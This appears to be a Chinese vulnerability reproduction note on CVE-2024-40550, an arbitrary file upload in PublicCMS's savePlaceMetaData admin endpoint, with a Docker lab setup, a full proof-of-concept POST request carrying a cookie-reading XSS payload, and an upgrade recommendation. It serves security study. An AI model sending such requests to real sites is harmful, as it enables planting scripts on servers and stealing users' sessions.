免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
02
—
漏洞影响
publicCms v.4.0.202302.e版本
03
—
漏洞描述
publicCms v.4.0.202302.e版本的/admin/cmsTemplate/savePlaceMetaData组件中存在任意文件上传漏洞,攻击者可通过上传精心制作的文件来执行任意代码。从而导致web服务器沦陷。
04
—
publicCms是个开源项目,gitee地址如下,可以使用源码搭建,也可以直接下载运行包
https://gitee.com/sanluan/PublicCMS
我是使用docker搭建靶场,下载镜像
docker pull sanluan/publiccms:V4.0.202302.e
启动容器
docker run -d -p 8080:8080 sanluan/publiccms:V4.0.202302.e
05
—
漏洞复现
POC数据包
注意:只能在登录后触发。cookie和_csrf的值需要替换。
POST /admin/cmsTemplate/savePlaceMetaData HTTP/1.1
Host: localhost:8080
Connection: close
Content-Length: 112
Content-Type: application/x-www-form-urlencoded
Cookie:
_csrf=e37f6445-3075-4ef1-b425-d75cb720283b&path=tee4.html&content=<img%20src=1%20onerror=alert(document.cookie)>
文件回显
http://localhost:8080/includetee4.html
漏洞复现成功
06
—
修复建议
升级到最新版本。
~~~关注不迷路,点赞你最帅~~~
原文始发于微信公众号(AI与网安):CVE-2024-40550 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论